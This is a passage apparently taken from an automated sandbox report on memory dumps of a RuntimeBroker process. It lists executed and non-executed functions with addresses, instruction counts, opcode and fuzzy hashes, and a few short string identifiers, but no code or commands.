                                • Opcode ID: 6cb7c17bef2950800e37d33827cc63107207ffbc3e46ea91c7d4801093a7e0b2
                                • Instruction ID: 4f11716938df311a4300a9e875a6f128b89d33d9bcca0d6634aa6155bdf46a62
                                • Opcode Fuzzy Hash: 6cb7c17bef2950800e37d33827cc63107207ffbc3e46ea91c7d4801093a7e0b2
                                • Instruction Fuzzy Hash: 7F11E671E1894D8FDB88EB9CD4A5AADB7F2FF98300F100569E51DD7299CA34A8428B40
                                Function 00007FFD9B88186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction ID: 4e7380405c5fa0d7a0b30fd0c10e7661c7191ef7aeee2f6f53402d1a05b7253a
                                • Opcode Fuzzy Hash: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction Fuzzy Hash: A7110D31E5A92D8FD768EBA0D4617FCB271FF0A701F4114B9D05EA6192CE396A44CB40
                                Function 00007FFD9B880C05 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bfe13e44b10c7336b5129a9cc62449a4afb4c05e3182545c59e20f9ccd89342a
                                • Instruction ID: cda0a25b73ebed601809991c1e8e4c52e7f4aaac4c2d550267c836ce424fad79
                                • Opcode Fuzzy Hash: bfe13e44b10c7336b5129a9cc62449a4afb4c05e3182545c59e20f9ccd89342a
                                • Instruction Fuzzy Hash: 8F11A331F15D1E4FDB68EBA4D8657EDB362FF45300F81027AD029AB1A5DE3479458B80
                                Function 00007FFD9B8808B1 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 736e620c0aeee470c66fb550ab9f398d4ca012fffe8a4e41159df0193cf20920
                                • Instruction ID: 0c63ea2c2da5e01707fa60e431067ad4387efb064437f9552e62af15ffaa0107
                                • Opcode Fuzzy Hash: 736e620c0aeee470c66fb550ab9f398d4ca012fffe8a4e41159df0193cf20920
                                • Instruction Fuzzy Hash: D4F02231A09A4D9FD794EB6888A95EC7FB0FF89340F8101FAD018C31A2EF3826958740
                                Function 00007FFD9B881F5D Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d621e328499b6238f3eb2eadcac3f1a8021fdd5457a793737e35a438b610c95
                                • Instruction ID: 6e912f9bff316b29a17d87cdf2b2fba1eb78c72ef64b6ddff22d1b9d7d096bad
                                • Opcode Fuzzy Hash: 6d621e328499b6238f3eb2eadcac3f1a8021fdd5457a793737e35a438b610c95
                                • Instruction Fuzzy Hash: BEF0283190EA4D4FD714EB6888655EC7FA0EF48240F4101F5D429C60E2EF386946C301
                                Function 00007FFD9B881241 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction ID: bcf24a5dc90924ff5e98082d103c336fa76c56cd22bf18f8858ea18e1c065664
                                • Opcode Fuzzy Hash: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction Fuzzy Hash: CEF0BE3050E64D8FCB66EF14C8556E93BA0FF5A300F0601AAE41CC71A2CB7ADA64CB81
                                Function 00007FFD9B888399 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c95481ccd43150366ea218c95990bef91d079f658e83d2192fb053ddae4b7e2e
                                • Instruction ID: 437673ff52f25dc9e5d84addf058de7c718753d71cebfc0fa07981ef6f5f75df
                                • Opcode Fuzzy Hash: c95481ccd43150366ea218c95990bef91d079f658e83d2192fb053ddae4b7e2e
                                • Instruction Fuzzy Hash: 8CF03C3091DA8D8FDB51EB6888686ED7FF0FF19304F4504A7D458D60A2D7389544CB41
                                Function 00007FFD9B880528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction ID: e6f277bfdbd44c6b49878375b8cf172483cecaccf1affced6d632e91666cb1a1
                                • Opcode Fuzzy Hash: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction Fuzzy Hash: D6F05E30509A0E8FDB65EF5494116E577A0FF59304F000176E42CD6196CA35A660C781
                                Function 00007FFD9B8881E0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction ID: 61377d79ac162976e87490f508ceecd4766b034370dbb9cee9c3091ebeb45a03
                                • Opcode Fuzzy Hash: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction Fuzzy Hash: 1CE0D875989D4CCBCB649B599C5029477B1FB4D304F01026DE45CC7191D7355E56C301
                                Function 00007FFD9B88685C Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction ID: fdcc27c5cec694ea759e9b6e237a40e219626e3a4e5591844828d89103f0611b
                                • Opcode Fuzzy Hash: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction Fuzzy Hash: 23E06F32A0AE0C8BCB60AF98ACA028833A0FB8C308F01026AE45CC7180D3316A84C302
                                Function 00007FFD9B881F15 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction ID: c3b67f0477bc8078d90c3d9f6a03a0dbe0e803dc6fb174bfdf36870062390c4a
                                • Opcode Fuzzy Hash: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction Fuzzy Hash: F0E09231C4FA8E4FD7216F6489661E97B60FF0A700F0616BAD06886092DB7C9628C741
                                Function 00007FFD9B881C19 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction ID: efa91c2ae656b92b4a86e1885715b473e92c9d06697392523168f69425bc3470
                                • Opcode Fuzzy Hash: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction Fuzzy Hash: 3FE0A03184F78D4FD7626B6448611D57B70FF0A700F0A15A6D068C60A2DA6896588302
                                Function 00007FFD9B882536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e59796711f8bdaf1a177f0565e53285a9da8550a4d84b33db4c4215521e94b65
                                • Instruction ID: 138cf161bf268798f3b7c2cb17b10cd939a847c262587f7edcd458ea95d47b4d
                                • Opcode Fuzzy Hash: e59796711f8bdaf1a177f0565e53285a9da8550a4d84b33db4c4215521e94b65
                                • Instruction Fuzzy Hash: 02F0947195495D4FDFA4DF54C494BA9B3B1FB58340F1086E6901DD3155DA30AE858F40
                                Function 00007FFD9B880530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: c7f4516cd99f28ee773ec3fcc90fa90195b457c14083bdfba21257d30318141a
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: D0E04F30509A0ECFDBA4EF58C4506A677A1FF5C304F100539E42CD6190CB35E6A0CB80
                                Function 00007FFD9B880C65 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab8c1c543e5ceae2766cdf9bbd074c54b1ff4ea58c673c17e590aea0c0d09b0d
                                • Instruction ID: 37a6b3c766097fab7acda8fcb30e30c3499d5dde4b70509af5fe3edd9033e0f8
                                • Opcode Fuzzy Hash: ab8c1c543e5ceae2766cdf9bbd074c54b1ff4ea58c673c17e590aea0c0d09b0d
                                • Instruction Fuzzy Hash: 05D0E231B0592D8ECB64EA98E8107EDBB71EF89311F8002B2C11DE3159DA306A428B81

                                Non-executed Functions

                                Function 00007FFD9B8806FA Relevance: 7.7, Strings: 6, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^U$O_^X$O_^f$O_^g
                                • API String ID: 0-1252858796
                                • Opcode ID: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction ID: e68626b80c5bcb7ef160820daebc656f64b3a71310be03e057027d77c6bd2453
                                • Opcode Fuzzy Hash: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction Fuzzy Hash: 03518C63B1FAC54FEB21279C3C651A83B90FF85B2171505F7E0A88A1A7F825A9468281
                                Function 00007FFD9B8806A5 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_I$O_^J$O_^K$O_^f$O_^g
                                • API String ID: 0-2965963803
                                • Opcode ID: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction ID: 0bb0647acc2acea5912c8425b719c10f2b8562da3ca9080f8019508e275735f9
                                • Opcode Fuzzy Hash: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction Fuzzy Hash: 98517B63B1FAC54FEB3537AC7C641A82790FFC5B2171505F7E0A8CA0E7E865A9468281

                                Executed Functions

                                Function 00007FFD9B8B0F88 Relevance: .6, Instructions: 614COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df866ad7101a2b488d973b7614f475e5b044bde68132093470fb229ea0096372
                                • Instruction ID: 65d4bedfc19f8fc9ab804e8d26b6e66a8a57c5ed5e7857825795397559bad241
                                • Opcode Fuzzy Hash: df866ad7101a2b488d973b7614f475e5b044bde68132093470fb229ea0096372
                                • Instruction Fuzzy Hash: CF42D670E1962D8FDBA8DF68C8A0BEDB7B1FF58301F5041A9D00DA7295DA346A81CF40
                                Function 00007FFD9B8B06E0 Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: =L_^$?L_I$L_^X$L_^f$L_^g
                                • API String ID: 0-1339829850
                                • Opcode ID: b5171ec85570851b09f5c0a872c2e4cd6932cb690605b4013c2e07473dbb7700
                                • Instruction ID: 069e4772647c862daec0ead5487c17e617d47972de9298b90cdc05530f529c3a
                                • Opcode Fuzzy Hash: b5171ec85570851b09f5c0a872c2e4cd6932cb690605b4013c2e07473dbb7700
                                • Instruction Fuzzy Hash: 9E61CBA3B1F6995BE76657ED6C250FC7BA0FF85660B0402F7E058860F7EC156A028BC1
                                Function 00007FFD9B8B0F98 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: &
                                • API String ID: 0-2822232526
                                • Opcode ID: 631000030bb7cf27e5ab59844d74ba9de17b4c2d8f73ccae12dc4a5e38df34e6
                                • Instruction ID: e06ffc98cd60531caff8321069e77c2d2c132531bb26e01813a5cffe524b9ea8
                                • Opcode Fuzzy Hash: 631000030bb7cf27e5ab59844d74ba9de17b4c2d8f73ccae12dc4a5e38df34e6
                                • Instruction Fuzzy Hash: 80D13D71E1965D8FDBACDB68D864BA8B7B1FF58300F4441BAD00DE32A6DA346981CF41
                                Function 00007FFD9B8B04F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?L_^
                                • API String ID: 0-1098677799
                                • Opcode ID: 039091645b6a6c88896c9be0a40d3117758e8fa73b970abb7ef237f58c20a062
                                • Instruction ID: d17e4623dfc08d415a551a0699b3af363519e18d4aa47aca55ec7d940e73da13
                                • Opcode Fuzzy Hash: 039091645b6a6c88896c9be0a40d3117758e8fa73b970abb7ef237f58c20a062
                                • Instruction Fuzzy Hash: C601D231A0926E8FC756EF7898615FA37A0EF05308F04017AE05CCA093EE29A551CB85
                                Function 00007FFD9B8B7C89 Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a257a32f7ae805ea75b8ad0c7cee22c44ea25743dd97bd51dca91a995d2554a
                                • Instruction ID: f1ff17ed6342ea8250da9855b1e4b54e74526da0a57f6df6437a64ecdca22093
                                • Opcode Fuzzy Hash: 5a257a32f7ae805ea75b8ad0c7cee22c44ea25743dd97bd51dca91a995d2554a
                                • Instruction Fuzzy Hash: 18C18E70A0A62D8FDB64DBA884917AD77B5FF98305F51417AD00DD7295CB386982CF80
                                Function 00007FFD9B8B3239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dea28a1652d14d3b23ace882ae9bb9d1d2591a4d7cedd8a7dedba0e699ac8482
                                • Instruction ID: 86456f69b6c7e4f93f906695a825e8f0b821de8941aa7abfb5cff9cdff35bd1d
                                • Opcode Fuzzy Hash: dea28a1652d14d3b23ace882ae9bb9d1d2591a4d7cedd8a7dedba0e699ac8482
                                • Instruction Fuzzy Hash: 7AB14D71E1965D8FDBACDB68D864BA8B7A1FF58300F4401BAD00DD72A2DE346981CF41
                                Function 00007FFD9B8B05D8 Relevance: .3, Instructions: 279COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b242b53cf770ee98c088a369559d20a65dc69b8c7a8a7b8cae64d5eea39fc11a
                                • Instruction ID: 4c395f8b684d9033dfc164ccf1b2c51cc17e228ad15237c2d4318ceec6c75cab
                                • Opcode Fuzzy Hash: b242b53cf770ee98c088a369559d20a65dc69b8c7a8a7b8cae64d5eea39fc11a
                                • Instruction Fuzzy Hash: C781E431B1DA594BDB5CEF6C88605B977E2FF98300B15417EE45DC72A6DE34E9028B80
                                Function 00007FFD9B8B6163 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 641730d3a53b3db8c3d4090b44a71318723433b18b78f58e23f98aeaaa199a7e
                                • Instruction ID: 6d9e61c078900241b21fc7d973f8380d007f47089eae5b380d4ac5361f3a3a5e
                                • Opcode Fuzzy Hash: 641730d3a53b3db8c3d4090b44a71318723433b18b78f58e23f98aeaaa199a7e
                                • Instruction Fuzzy Hash: 81719570E1891D8FEB94EFA8D8A5BECB7B1FF58300F5041AAD01DE3295DA3469818F41
                                Function 00007FFD9B8B5931 Relevance: .2, Instructions: 196COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd3361ebe39aac52047504ef7fa224e4a36ffa43bb8893c143027481bb6bffeb
                                • Instruction ID: 5b4247591d1c2f4b7a7ce413f2cd0e7e824eac2a1d00c9ee4e0bb43b503d4d35
                                • Opcode Fuzzy Hash: fd3361ebe39aac52047504ef7fa224e4a36ffa43bb8893c143027481bb6bffeb
                                • Instruction Fuzzy Hash: 9C51D830A0E68D8FDB95EF78D4A4AAD7BF1EF59314F1405BAD00DD7296CA34A841CB41
                                Function 00007FFD9B8B129D Relevance: .2, Instructions: 184COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aa6d139729126aa400d485461f6537de068386ca7f4398a172df7082906f86cd
                                • Instruction ID: 5d44a688d10bedeb7df2317e83605c7502e3fa183d09f74a4aa3ee6c064c0cfb
                                • Opcode Fuzzy Hash: aa6d139729126aa400d485461f6537de068386ca7f4398a172df7082906f86cd
                                • Instruction Fuzzy Hash: D3510131B18A594FDB58DF2888645BA77E2FF98300B15417ED45EC7291DE34E9028B81
                                Function 00007FFD9B8B2CD9 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 633c0b6a68f8cccd1a75d0fdb8a4db50478bbfc42d44a8dff6b28430046754a7
                                • Instruction ID: f8a5be7d03f417f4df09c55486b497dc0d9e5710ad8bdd1d9c2767754bb66e96
                                • Opcode Fuzzy Hash: 633c0b6a68f8cccd1a75d0fdb8a4db50478bbfc42d44a8dff6b28430046754a7
                                • Instruction Fuzzy Hash: A0515271A0995D8FDF94EFA8D865AECBBB1FF59300F45016AE00DE7292CB246941CB80
                                Function 00007FFD9B8B238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fa2b9c1c3615b0ff49bb94c8ef0daa8d6667f2c43736e82f4041d7cb380a4b23
                                • Instruction ID: da55470e1b49eb9cd75ce2e2de4c7be7a725ab6cbe6257f346bc14b848454f2c
                                • Opcode Fuzzy Hash: fa2b9c1c3615b0ff49bb94c8ef0daa8d6667f2c43736e82f4041d7cb380a4b23
                                • Instruction Fuzzy Hash: B251EA61A0E6AD4EE7A1DB785C657A87FA0EF59300F0540F7D04CC71E7DD246A85CB81
                                Function 00007FFD9B8B1828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19c11b897622cc26e9ae3ea4dbf341ced46936d6eab94a247ffb236bbd8a44e4
                                • Instruction ID: 4038fbd651bdc98d643b6345575ee21a89d3c274c2b9e7c1e0627acc3fa9f97c
                                • Opcode Fuzzy Hash: 19c11b897622cc26e9ae3ea4dbf341ced46936d6eab94a247ffb236bbd8a44e4
                                • Instruction Fuzzy Hash: F2319530E2E62E8AE774BB6084217F9B2A1FF4A300F410279D05E961E5CF396A45CEC0
                                Function 00007FFD9B8B1CA9 Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 610dc8da61fef79331d646f7d0e187308260ce5ca413a02e94c08a520c1c7d60
                                • Instruction ID: 78fb895b339f0899dc52e5e28edc2235ca6719075ffd5369f032d6ddbce231ab
                                • Opcode Fuzzy Hash: 610dc8da61fef79331d646f7d0e187308260ce5ca413a02e94c08a520c1c7d60
                                • Instruction Fuzzy Hash: A3414F35E1991D8FDB54EBA8C864AECB7F1FF58301F4501AAD009D72A1DB38A945CB40
                                Function 00007FFD9B8B5FDD Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12c30d2168472cc464fa03dbc8041f4326f9c4ec561bea11b53952d9708901ea
                                • Instruction ID: 8fc1b57a1a7cace735c61269bd18007d06048da18083627cb710edeb93be7b6d
                                • Opcode Fuzzy Hash: 12c30d2168472cc464fa03dbc8041f4326f9c4ec561bea11b53952d9708901ea
                                • Instruction Fuzzy Hash: 52417E70E1865D8FEB84EBE8D865AEDBBF1FF48310F050176E008E3296DA346941CB81
                                Function 00007FFD9B8B64E9 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
